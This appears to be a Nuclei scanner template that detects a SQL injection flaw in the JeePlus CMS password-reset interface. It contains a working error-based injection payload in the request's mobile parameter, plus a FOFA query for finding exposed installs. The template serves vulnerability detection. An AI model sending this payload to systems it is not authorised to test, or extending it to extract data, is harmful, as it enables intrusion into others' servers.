id: jeeplus-cms-resetpassword-sqli

info:
  name: jeeplus-cms-resetpassword-sqli
  author: WingBy_fkalis
  severity: high
  description: There is a SQL injection vulnerability in the jeeplus CMS resetpassword interface
  tags: jeecg,sqli
  metadata:
    fofa-qeury:  (body="jeeplus.js" && body="/static/common/") || title="JeePlus 快速开发平台"

http:
  - raw:
      - |              
        GET /a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(123456)),0x7e),1))%23 HTTP/1.1
        Host: 
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
          
    matchers:     
      - type: dsl
        name: sqli
        dsl:
          - "status_code == 200 && contains(body,'e10adc3949ba59abbe56e057f20f883') && contains(body,'XPATH')" 
